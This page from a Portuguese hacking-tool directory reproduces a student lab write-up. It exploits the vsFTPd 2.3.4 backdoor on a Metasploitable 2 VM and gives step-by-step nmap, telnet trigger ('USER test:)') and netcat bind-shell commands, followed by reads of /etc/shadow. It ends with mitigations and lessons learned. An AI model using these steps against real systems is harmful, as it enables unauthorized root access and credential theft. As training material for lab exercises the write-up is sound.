Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
metasploitable2-vsftpd-exploitation — Projeto: exploração de backdoor do vsFTPd 2.3.4 (CVE-2011-2523) no Metasploitable 2. | Kitploit
Ferramentas/GitHubGitHub/rinaliyeva/metasploitable2-vsftpd-exploitation
Quebra de SenhasEscalada de PrivilégiosReconhecimentoMapeamento de RedeEscaneamento de PortasAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoTestes de Penetração

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Aprendizado e Educação
GitHubrinaliyeva/metasploitable2-vsftpd-exploitation

metasploitable2-vsftpd-exploitation

Projeto: exploração de backdoor do vsFTPd 2.3.4 (CVE-2011-2523) no Metasploitable 2.

Ver Repositório
há 4 mesesAinda não revisado

Laboratório de Exploração do vsFTPd 2.3.4 - Metasploitable 2

Visão Geral

Este projeto demonstra um fluxo de trabalho de teste de penetração contra uma máquina deliberadamente vulnerável, Metasploitable 2. O objetivo era identificar, explorar e analisar uma vulnerabilidade conhecida no serviço FTP, alcançando finalmente acesso de root e avaliando o impacto de segurança.


Configuração do Laboratório

  • Máquina Atacante: Ubuntu (Máquina Virtual)
  • Máquina Alvo: Metasploitable 2 (Máquina Virtual)
  • Configuração de Rede: Rede host-only (192.168.56.0/24)

Verificação do Alvo

Verificado o sistema alvo e sua configuração de rede:

root@kitploit:~
whoami
hostname
ifconfig

Verificação da configuração do alvo


Verificação de Conectividade

Confirmada a conectividade de rede entre atacante e alvo:

root@kitploit:~
ping 192.168.56.101

Verificação de conectividade com ping


Objetivos

  • Realizar reconhecimento de rede
  • Identificar serviços expostos
  • Detectar software vulnerável
  • Explorar uma vulnerabilidade de backdoor conhecida
  • Obter acesso de root
  • Conduzir análise pós-exploração

Ferramentas Utilizadas

  • Nmap
  • Telnet
  • Netcat
  • Linux (VM Ubuntu)

Resumo do Fluxo de Ataque

  1. Verificou a configuração e conectividade do alvo
  2. Descobriu o host alvo na rede local
  3. Identificou portas abertas e serviços expostos
  4. Detectou serviço FTP vulnerável (vsFTPd 2.3.4)
  5. Acionou backdoor via login FTP manipulado
  6. Obteve acesso de root através de bind shell
  7. Realizou enumeração pós-exploração

Reconhecimento

Realizou a descoberta de hosts:

root@kitploit:~
nmap -sn 192.168.56.0/24

Identificou hosts ativos na rede.

Varredura de descoberta de hosts


Varredura de Portas

root@kitploit:~
nmap 192.168.56.101

Descobriu múltiplas portas abertas, incluindo:

  • 21 (FTP)
  • 22 (SSH)
  • 23 (Telnet)
  • 80 (HTTP)
  • 445 (SMB)

Resultados da varredura de portas


Enumeração de Serviços

root@kitploit:~
nmap -sV 192.168.56.101

Identificou o serviço FTP em execução:

root@kitploit:~
vsFTPd 2.3.4

Uma varredura completa de serviços e baseada em scripts está incluída nos arquivos de suporte: Resultado da Varredura Nmap.

Enumeração de serviços


Identificação da Vulnerabilidade

O serviço FTP estava executando uma versão vulnerável conhecida:

vsFTPd 2.3.4

Esta versão do vsFTPd foi distribuída com um backdoor malicioso que é acionado quando um nome de usuário contendo :) é usado durante a autenticação. Após a ativação, o serviço abre um bind shell na porta 6200, permitindo acesso remoto não autorizado.


Exploração (Manual)

Acionou o backdoor usando Telnet:

root@kitploit:~
telnet 192.168.56.101 21
root@kitploit:~
USER test:)
PASS test

Acionamento do backdoor via Telnet


Acesso ao Shell

Conectou-se ao backdoor usando Netcat:

root@kitploit:~
nc 192.168.56.101 6200

Conexão bind shell


Resultado

root@kitploit:~
whoami
root@kitploit:~
root

Acesso root obtido com sucesso

Prova de acesso root


Pós-Exploração

Após obter acesso root, foi realizada enumeração básica do sistema:

root@kitploit:~
cat /etc/passwd
cat /etc/shadow
  • Enumerou usuários do sistema e contas de serviço
  • Recuperou hashes de credenciais de /etc/shadow
  • Demonstrou acesso a arquivos sensíveis do sistema

Enumeração de usuários

Acesso ao arquivo shadow


Impacto

  • Comprometimento total do sistema (acesso de root)
  • Capacidade de executar comandos arbitrários
  • Exposição de dados de credenciais sensíveis
  • Potencial para movimento lateral dentro de uma rede

Mitigação

  • Remover ou desabilitar o serviço FTP se não for necessário
  • Atualizar software vulnerável para versões seguras
  • Substituir protocolos inseguros (como FTP não criptografado) por alternativas seguras (SFTP)
  • Restringir o acesso a serviços críticos através de regras de firewall
  • Implementar registro e monitoramento
  • Aplicar políticas de autenticação forte

Arquivos de Suporte

  • Resultado da Varredura Nmap

Lição Principal

Este laboratório demonstra como um único serviço vulnerável pode levar ao comprometimento total do sistema. Ele destaca a importância da configuração adequada do serviço, gerenciamento de patches e minimização de superfícies de ataque expostas.

O Que Aprendi

Esta foi a primeira vez que explorei manualmente um backdoor do mundo real. Aprendi como uma única string de nome de usuário malicioso (:)) pode acionar acesso de root, o que reforçou por que a enumeração de serviços e a detecção de versão são tão importantes no reconhecimento. Também me senti mais confortável com comandos básicos de pós-exploração no Linux, como ler /etc/shadow e entender a aparência real de hashes de credenciais.

Limitações

Este foi um ambiente de laboratório controlado usando o Metasploitable 2, uma máquina intencionalmente vulnerável. O backdoor do vsFTPd 2.3.4 é um CVE conhecido (CVE-2011-2523) de 2011, portanto isso não reflete um cenário real moderno. Em uma avaliação real, etapas adicionais como evasão, bypass de logs ou pivoting seriam necessárias. Este projeto focou em entender os mecanismos principais do exploit, não um teste de penetração completo.

Baixar ferramenta